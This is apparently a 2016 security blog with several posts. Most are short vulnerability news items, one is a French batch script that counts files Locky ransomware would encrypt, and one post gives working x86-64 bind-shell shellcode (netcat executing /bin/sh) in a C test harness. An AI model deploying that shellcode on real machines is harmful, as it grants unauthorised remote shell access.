Sep 16 08

passwdSecurity researcher Robert Fuller discovered an attack method with which Windows and Mac user credentials can be stolen from a locked machine.
This attack is affected against actual Windows and Mac OS computers on which the user has already logged in.

The researcher used USB-based Ethernet dongles like USB Armory or Hak5 Turtle , for which he modified the firmware code to run special software that sets the plug-and-play USB device as the network gateway, DNS, and WPAD servers on the computer it’s connected to.
Find out more:

written by d45id \\ tags: , , , , , ,

Jul 16 06

Floser Bacurio and Roland Dela Paz published an interesting article about Locky’s new anti-sandbox technique and how to crack it.

Find out more: Cracking Locky’s New Anti-Sandbox Technique

written by d45id \\ tags: , , ,

Jul 16 06
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#include <stdio.h>
#include <string.h>
 
// Victim: netstat -an | grep LISTEN | grep tcp
// Attacker: nc <victim_IP> <port>
 
unsigned char code[] = \
 
#define PORT "\x39\x39"
// Keep to two bytes
 
"\x48\x31\xff\x48\xf7\xe7\x50\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x6e\x63\x57\x48\x89\xe7\x50\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe3\x68\x2d\x6c\x76\x65\x48\x89\xe1\x68\x2d\x70"PORT"\x48\x89\xe6\x50\x53\x51\x56\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
;
 
int main ()
{
    // I make sure there are no nulls
    // The string count will terminate at the first \x00
    printf("The Shellcode is %d Bytes Long\n", strlen(code));
 
    // Next I throw 0xAAAAAAAA into every register before shellcode execution
    // This ensures that the shellcode will run in any circumstance
 
	__asm__("mov $0xAAAAAAAAAAAAAAAA, %rax\n\t"
		"mov %rax, %rbx\n\t" "mov %rax, %rcx\n\t" "mov %rax, %rdx\n\t" 
		"mov %rax, %rsi\n\t" "mov %rax, %rdi\n\t" "mov %rax, %rbp\n\t" 
		"mov %rax, %r10\n\t" "mov %rax, %r11\n\t" "mov %rax, %r12\n\t" 
		"mov %rax, %r13\n\t" "mov %rax, %r14\n\t" "mov %rax, %r15\n\t"
		"call code");
	return 0;
}

written by d45id \\ tags: , , , ,

Apr 16 26

Integendeel!
Mooie video over privacy en beveiligde instant messaging

written by d45id \\ tags: , , , , ,

Apr 16 26

Avec ce petit script que vous pouvez voir quel type de fichiers serait chiffré en cas d’infection par le LOCKY virus.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
@echo off
setlocal enabledelayedexpansion
echo 
set total=0
cls
for %%i in (a b c d e f g h i j k l m n o p q r s t u v w x y z) do (
  set DRIVE=%%i:\
  if exist !DRIVE! (
    call :lookup !DRIVE!
  )
)
echo Nombre de fichiers potentiellement affectés : %total%
pause
goto :eof
 
:lookup
set drive=%1
set subtotal=0
echo Examiner %drive%
for /r %drive% %%i in (*.mid *.wma *.flv *.mkv *.mov *.avi *.asf *.mpeg *.vob *.mpg *.wmv *.fla *.swf *.wav *.qcow2 *.vdi *.vmdk *.vmx *.gpg *.aes *.ARC *.PAQ *.tar*.bz2 *.tbk *.bak *.tar *.tgz *.rar *.zip *.djv *.djvu *.svg *.bmp *.png *.gif *.raw *.cgm *.jpeg *.jpg *.tif *.tiff *.NEF *.psd *.cmd *.bat *.class *.jar *.java *.asp *.brd *.sch *.dch *.dip *.vbs *.asm *.pas *.cpp *.php *.ldf *.mdf *.ibd *.MYI *.MYD *.frm *.odb *.dbf *.mdb *.sql *.SQLITEDB *.SQLITE3 *.asc *.lay6 *.lay *.ms11 *.sldm *.sldx *.ppsm *.ppsx *.ppam *.docb *.mml *.sxm *.otg *.odg *.uop *.potx *.potm *.pptx *.pptm *.std *.sxd *.pot *.pps *.sti *.sxi *.otp *.odp *.wks *.xltx *.xltm *.xlsx *.xlsm *.xlsb *.slk *.xlw *.xlt *.xlm *.xlc *.dif *.stc *.sxc *.ots *.ods *.hwp *.dotm *.dotx *.docm *.docx *.DOT *.max *.xml *.txt *.CSV *.uot *.RTF *.pdf *.XLS *.PPT *.stw *.sxw *.ott *.odt *.DOC *.pem *.csr *.crt *.key wallet*.dat) do (
  echo %%i
  set /a subtotal=subtotal + 1
  set /a total=total + 1
)
echo fichiers trouvés: %subtotal%
pause
goto :eof

written by d45id \\ tags: , , , , ,

Feb 16 18

tuxOh no! google engineers discovered a stack-based buffer overflow vulnerability in the getaddrinfo() library function in the DNS resolver, shipped with glibc versions since 2.9, which may allow a remote attacker to execute arbitrary code.

written by d45id \\ tags: , , , , , ,

Feb 16 11

Engineers from exodus intelligence demonstrated an awesome undocumented feature in Cisco Adaptive Security Appliance (ASA), remote code execution via UDP. This feature is implemented in the Cisco IKE feature set. The algorithm for re-assembling IKE payloads fragmented with the Cisco fragmentation protocol contains a bounds-checking flaw that allows a heap buffer to be overflowed with attacker-controlled data.

Find out more:

written by d45id \\ tags: , , , , , , ,

Jan 16 14

sourcecodeToday OpenSSH project reported an bug in the client component of OpenSSH versions 5.4 up to 7.1.
The announced issue could allow an OpenSSH client to leak client memory to the connected SSH server including (private) key information. The vulnerability was discovered in the roaming feature of OpenSSH client which is default active.

This vulnerabilities affects the OpenSSH client on most operating systems like Linux, FreeBSD and Mac OSX. Continue reading »

written by d45id \\ tags: , , ,